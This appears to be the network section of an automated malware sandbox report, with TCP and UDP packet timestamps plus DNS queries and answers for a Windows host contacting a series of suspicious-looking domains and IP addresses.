                                        Sep 11, 2024 10:10:38.516591072 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:38.517201900 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:38.517261028 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:38.519004107 CEST4918280192.168.2.22203.161.43.228
                                        Sep 11, 2024 10:10:38.523937941 CEST8049182203.161.43.228192.168.2.22
                                        Sep 11, 2024 10:10:43.556051016 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.562002897 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:43.562246084 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.572134972 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.578269005 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:43.578284025 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:43.578555107 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:43.584481001 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186044931 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186069012 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186086893 CEST8049183161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:44.186140060 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:44.186882019 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:45.079991102 CEST4918380192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.096419096 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.101249933 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.103336096 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.112723112 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.117670059 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.727677107 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.727799892 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.727818012 CEST8049184161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:46.727844000 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:46.727881908 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:47.624558926 CEST4918480192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:48.639720917 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:48.644907951 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:48.644988060 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:48.656367064 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:48.661292076 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:48.661351919 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:48.661407948 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:48.666213036 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:48.666270971 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:49.275805950 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:49.275854111 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:49.275892019 CEST8049185161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:49.275902987 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:49.275975943 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:50.167069912 CEST4918580192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.182043076 CEST4918680192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.187186003 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.187251091 CEST4918680192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.193231106 CEST4918680192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.198215961 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.790452957 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.790471077 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.790482044 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.790493965 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.790503025 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.790551901 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:51.794228077 CEST4918680192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.794228077 CEST4918680192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.794228077 CEST4918680192.168.2.22161.97.168.245
                                        Sep 11, 2024 10:10:51.799448013 CEST8049186161.97.168.245192.168.2.22
                                        Sep 11, 2024 10:10:56.825736046 CEST4918780192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:56.830801964 CEST8049187172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:56.830868959 CEST4918780192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:56.840490103 CEST4918780192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:57.068516970 CEST8049187172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:57.068576097 CEST4918780192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:57.069185972 CEST8049187172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:57.073472023 CEST8049187172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:57.989214897 CEST8049187172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:57.989264011 CEST8049187172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:57.989567041 CEST4918780192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:58.343458891 CEST4918780192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:59.356483936 CEST4918880192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:59.361402988 CEST8049188172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:10:59.361460924 CEST4918880192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:59.370445013 CEST4918880192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:10:59.375327110 CEST8049188172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:00.293409109 CEST8049188172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:00.293459892 CEST8049188172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:00.293576956 CEST4918880192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:00.898454905 CEST4918880192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:01.915482998 CEST4918980192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:01.920624971 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:01.927103996 CEST4918980192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:01.934922934 CEST4918980192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:01.939845085 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:01.940052032 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:01.947081089 CEST4918980192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:01.951983929 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:01.952035904 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:02.844991922 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:02.845048904 CEST8049189172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:02.845087051 CEST4918980192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:03.441271067 CEST4918980192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:04.458257914 CEST4919080192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:04.463340998 CEST8049190172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:04.463397026 CEST4919080192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:04.470293999 CEST4919080192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:04.475138903 CEST8049190172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:05.390116930 CEST8049190172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:05.390290976 CEST8049190172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:05.390377045 CEST4919080192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:05.394901037 CEST4919080192.168.2.22172.96.191.39
                                        Sep 11, 2024 10:11:05.399928093 CEST8049190172.96.191.39192.168.2.22
                                        Sep 11, 2024 10:11:10.474082947 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:10.479052067 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:10.479110003 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:10.494278908 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:10.499162912 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:10.499217987 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:10.499408960 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:10.504060030 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:11.106477022 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:11.106491089 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:11.106537104 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:11.106647015 CEST8049191104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:11.106690884 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:11.211724043 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:11:11.216917038 CEST804916245.33.6.223192.168.2.22
                                        Sep 11, 2024 10:11:11.216991901 CEST4916280192.168.2.2245.33.6.223
                                        Sep 11, 2024 10:11:12.006031990 CEST4919180192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:13.022891045 CEST4919280192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:13.027858973 CEST8049192104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:13.027925014 CEST4919280192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:13.051879883 CEST4919280192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:13.056948900 CEST8049192104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:13.640247107 CEST8049192104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:13.640358925 CEST8049192104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:13.640706062 CEST4919280192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:13.641521931 CEST8049192104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:13.641746044 CEST4919280192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:14.564335108 CEST4919280192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:15.580981970 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:15.585946083 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:15.587224007 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:15.602130890 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:15.607053995 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:15.607381105 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:15.607566118 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:15.612384081 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:15.612457037 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:16.254100084 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:16.254115105 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:16.254127026 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:16.254137039 CEST8049193104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:16.254189968 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:16.254189968 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:17.106960058 CEST4919380192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.136482000 CEST4919480192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.141510963 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:18.141765118 CEST4919480192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.149590969 CEST4919480192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.154479027 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:18.744267941 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:18.744292021 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:18.744513035 CEST4919480192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.744714022 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:18.744818926 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:18.744877100 CEST4919480192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.750468969 CEST4919480192.168.2.22104.21.20.125
                                        Sep 11, 2024 10:11:18.755714893 CEST8049194104.21.20.125192.168.2.22
                                        Sep 11, 2024 10:11:24.079586983 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:24.084498882 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:24.084659100 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:24.094726086 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:24.099606037 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:24.099705935 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:24.099747896 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:24.104562044 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:25.267967939 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:25.267992020 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:25.268002033 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:25.268043995 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:25.268136024 CEST804919543.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:25.268184900 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:25.595045090 CEST4919580192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:26.611339092 CEST4919680192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:26.616369963 CEST804919643.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:26.616436005 CEST4919680192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:26.631670952 CEST4919680192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:26.636758089 CEST804919643.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:27.485145092 CEST804919643.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:27.485163927 CEST804919643.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:27.485295057 CEST4919680192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:28.136147976 CEST4919680192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:29.155545950 CEST4919780192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:29.160959005 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:29.161026955 CEST4919780192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:29.170734882 CEST4919780192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:29.175615072 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:29.175673008 CEST4919780192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:29.175750971 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:29.180512905 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:29.180588961 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:30.034816027 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:30.034945011 CEST804919743.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:30.035095930 CEST4919780192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:30.678971052 CEST4919780192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:31.699223042 CEST4919880192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:31.704319000 CEST804919843.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:31.707411051 CEST4919880192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:31.716268063 CEST4919880192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:31.721381903 CEST804919843.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:32.596515894 CEST804919843.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:32.596534967 CEST804919843.242.202.169192.168.2.22
                                        Sep 11, 2024 10:11:32.596649885 CEST4919880192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:32.599469900 CEST4919880192.168.2.2243.242.202.169
                                        Sep 11, 2024 10:11:32.604309082 CEST804919843.242.202.169192.168.2.22

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Sep 11, 2024 10:08:26.303112984 CEST138138192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:00.516547918 CEST5456253192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:00.529396057 CEST53545628.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:00.530128956 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:01.292959929 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:02.057602882 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:07.840605021 CEST5291753192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:07.854686022 CEST53529178.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:11.238426924 CEST6275153192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:11.247700930 CEST53627518.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:14.345866919 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:15.099033117 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:15.863327980 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:18.818635941 CEST5789353192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:18.854782104 CEST53578938.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:32.137922049 CEST5482153192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:32.147929907 CEST53548218.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:32.148597002 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:32.898763895 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:33.663218021 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:35.450675011 CEST5471953192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:35.484913111 CEST53547198.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:35.486026049 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:36.237073898 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:37.001467943 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:38.783665895 CEST4988153192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:38.800095081 CEST53498818.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:38.800646067 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:39.559822083 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:40.324233055 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:42.106103897 CEST5499853192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:42.116044044 CEST53549988.8.8.8192.168.2.22
                                        Sep 11, 2024 10:09:42.116693974 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:42.867156982 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:43.631513119 CEST137137192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:09:49.407293081 CEST5278153192.168.2.228.8.8.8
                                        Sep 11, 2024 10:09:49.685138941 CEST53527818.8.8.8192.168.2.22
                                        Sep 11, 2024 10:10:03.343184948 CEST6392653192.168.2.228.8.8.8
                                        Sep 11, 2024 10:10:03.356020927 CEST53639268.8.8.8192.168.2.22
                                        Sep 11, 2024 10:10:16.723469973 CEST6551053192.168.2.228.8.8.8
                                        Sep 11, 2024 10:10:16.746438980 CEST53655108.8.8.8192.168.2.22
                                        Sep 11, 2024 10:10:26.002357960 CEST138138192.168.2.22192.168.2.255
                                        Sep 11, 2024 10:10:30.086798906 CEST6267253192.168.2.228.8.8.8
                                        Sep 11, 2024 10:10:30.105835915 CEST53626728.8.8.8192.168.2.22
                                        Sep 11, 2024 10:10:43.528373003 CEST5647553192.168.2.228.8.8.8
                                        Sep 11, 2024 10:10:43.553064108 CEST53564758.8.8.8192.168.2.22
                                        Sep 11, 2024 10:10:56.803816080 CEST4938453192.168.2.228.8.8.8
                                        Sep 11, 2024 10:10:56.823900938 CEST53493848.8.8.8192.168.2.22
                                        Sep 11, 2024 10:11:10.403692007 CEST5484253192.168.2.228.8.8.8
                                        Sep 11, 2024 10:11:10.472023964 CEST53548428.8.8.8192.168.2.22
                                        Sep 11, 2024 10:11:23.766645908 CEST5810553192.168.2.228.8.8.8
                                        Sep 11, 2024 10:11:24.076240063 CEST53581058.8.8.8192.168.2.22
                                        Sep 11, 2024 10:11:37.609158039 CEST6492853192.168.2.228.8.8.8
                                        Sep 11, 2024 10:11:37.645036936 CEST53649288.8.8.8192.168.2.22
                                        Sep 11, 2024 10:11:38.653474092 CEST5739053192.168.2.228.8.8.8
                                        Sep 11, 2024 10:11:38.671403885 CEST53573908.8.8.8192.168.2.22
                                        Sep 11, 2024 10:11:39.682210922 CEST5809553192.168.2.228.8.8.8
                                        Sep 11, 2024 10:11:39.722929001 CEST53580958.8.8.8192.168.2.22
                                        Sep 11, 2024 10:11:40.743292093 CEST5426153192.168.2.228.8.8.8
                                        Sep 11, 2024 10:11:40.756820917 CEST53542618.8.8.8192.168.2.22

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Sep 11, 2024 10:09:00.516547918 CEST192.168.2.228.8.8.80xee20Standard query (0)www.monos.shopA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:07.840605021 CEST192.168.2.228.8.8.80x4722Standard query (0)www.726075.buzzA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:11.238426924 CEST192.168.2.228.8.8.80x8376Standard query (0)www.sqlite.orgA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:18.818635941 CEST192.168.2.228.8.8.80x422cStandard query (0)www.freepicture.onlineA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:32.137922049 CEST192.168.2.228.8.8.80xd406Standard query (0)www.318st.comA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:35.450675011 CEST192.168.2.228.8.8.80x990bStandard query (0)www.318st.comA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:38.783665895 CEST192.168.2.228.8.8.80x7084Standard query (0)www.318st.comA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:42.106103897 CEST192.168.2.228.8.8.80x226Standard query (0)www.318st.comA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:49.407293081 CEST192.168.2.228.8.8.80xacbfStandard query (0)www.hm62t.topA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:03.343184948 CEST192.168.2.228.8.8.80xa99fStandard query (0)www.golbasi-nakliyat.xyzA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:16.723469973 CEST192.168.2.228.8.8.80x4225Standard query (0)www.mfgamecompany.shopA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:30.086798906 CEST192.168.2.228.8.8.80x9e8aStandard query (0)www.quilo.lifeA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:43.528373003 CEST192.168.2.228.8.8.80xd8d6Standard query (0)www.qiluqiyuan.buzzA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:56.803816080 CEST192.168.2.228.8.8.80x2422Standard query (0)www.bola88site.oneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:10.403692007 CEST192.168.2.228.8.8.80xabbcStandard query (0)www.kckartal.xyzA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:23.766645908 CEST192.168.2.228.8.8.80x9fd1Standard query (0)www.mizuquan.topA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:37.609158039 CEST192.168.2.228.8.8.80x62cbStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:38.653474092 CEST192.168.2.228.8.8.80x943aStandard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:39.682210922 CEST192.168.2.228.8.8.80x6362Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:11:40.743292093 CEST192.168.2.228.8.8.80x7d16Standard query (0)www.kxshopmr.storeA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Sep 11, 2024 10:09:00.529396057 CEST8.8.8.8192.168.2.220xee20Name error (3)www.monos.shopnonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:07.854686022 CEST8.8.8.8192.168.2.220x4722No error (0)www.726075.buzz47.57.185.227A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:11.247700930 CEST8.8.8.8192.168.2.220x8376No error (0)www.sqlite.org45.33.6.223A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:18.854782104 CEST8.8.8.8192.168.2.220x422cNo error (0)www.freepicture.onlinefreepicture.onlineCNAME (Canonical name)IN (0x0001)false
                                        Sep 11, 2024 10:09:18.854782104 CEST8.8.8.8192.168.2.220x422cNo error (0)freepicture.online89.58.49.1A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:32.147929907 CEST8.8.8.8192.168.2.220xd406Name error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:35.484913111 CEST8.8.8.8192.168.2.220x990bName error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:38.800095081 CEST8.8.8.8192.168.2.220x7084Name error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:42.116044044 CEST8.8.8.8192.168.2.220x226Name error (3)www.318st.comnonenoneA (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:09:49.685138941 CEST8.8.8.8192.168.2.220xacbfNo error (0)www.hm62t.tophm62t.topCNAME (Canonical name)IN (0x0001)false
                                        Sep 11, 2024 10:09:49.685138941 CEST8.8.8.8192.168.2.220xacbfNo error (0)hm62t.top154.23.184.240A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:03.356020927 CEST8.8.8.8192.168.2.220xa99fNo error (0)www.golbasi-nakliyat.xyzredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                        Sep 11, 2024 10:10:03.356020927 CEST8.8.8.8192.168.2.220xa99fNo error (0)redirect.natrocdn.comnatroredirect.natrocdn.comCNAME (Canonical name)IN (0x0001)false
                                        Sep 11, 2024 10:10:03.356020927 CEST8.8.8.8192.168.2.220xa99fNo error (0)natroredirect.natrocdn.com85.159.66.93A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:16.746438980 CEST8.8.8.8192.168.2.220x4225No error (0)www.mfgamecompany.shopmfgamecompany.shopCNAME (Canonical name)IN (0x0001)false
                                        Sep 11, 2024 10:10:16.746438980 CEST8.8.8.8192.168.2.220x4225No error (0)mfgamecompany.shop185.173.111.76A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:30.105835915 CEST8.8.8.8192.168.2.220x9e8aNo error (0)www.quilo.life203.161.43.228A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:43.553064108 CEST8.8.8.8192.168.2.220xd8d6No error (0)www.qiluqiyuan.buzz161.97.168.245A (IP address)IN (0x0001)false
                                        Sep 11, 2024 10:10:56.823900938 CEST8.8.8.8192.168.2.220x2422No error (0)www.bola88site.onebola88site.oneCNAME (Canonical name)IN (0x0001)false
                                        Sep 11, 2024 10:10:56.823900938 CEST8.8.8.8192.168.2.220x2422No error (0)bola88site.one172.96.191.39A (IP address)IN (0x0001)false
